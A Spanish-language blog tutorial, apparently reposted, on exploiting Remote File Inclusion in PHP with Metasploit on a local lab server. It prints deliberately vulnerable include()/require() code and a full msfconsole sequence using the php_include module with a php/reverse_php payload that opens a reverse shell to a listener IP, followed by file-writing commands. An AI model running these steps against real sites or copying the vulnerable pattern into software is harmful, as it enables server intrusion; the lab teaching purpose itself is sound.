Explotacion con metasploit de Módulo Remote File Inclusion (RFI)

Hoy en blackploit.com han publicado un mas que interesante tutorial sobre la explotación de RFI utilizando Metasploit.

Una muestra más de que Metasploit sirve para explotar cualquier tipo de vulnerabilidad está aquí, un módulo de Metasploit para explotarRFIs.

RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos – vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la funcióninclude().

Así que le pongo este lindo vídeo y más abajo la explicación de cada cosa que se hace en él 😉

Lo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php

cd /var/www/html

mkdir 1

vi 1/index.php

Se agrega al archivo index.php el pedazo de código vulnerable:

<?php
$color='blue';
if (isset($_GET['COLOR']))
$color = $_GET['COLOR'];
require($color.'.php');
?>

también puede ser este:

<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>

De aquí en adelante pongo el comando y al lado entre corchetes [] la explicación:

chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache]
msfconsole [Echa a andar la consola de MSF]
use unix/webapp/php_include [Exploit que se va usar]
set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri]
set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)]
set RHOST localhost [IP o host del objetivo]
set PAYLOAD php/reverse_php [Elegimos un Payload]
set LHOST 172.16.61.132 [IP donde se conectará la víctima]
exploit [Echa a andar el exploit]
dir [Mira archivos en el directorio]
touch test.txt [Crea un archivo llamado test.txt]
echo Owned > test.txt [Escribe Owned dentro de test.txt]

[+] Eso era todo
[+] El vídeo lo saqué de http://www.securitytube.net/
[+] Si me equivoco en algo me avisan (no soy perfecto XD)
[+] Salu2
[+] ZioneR

Visto en: blackploit.com

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*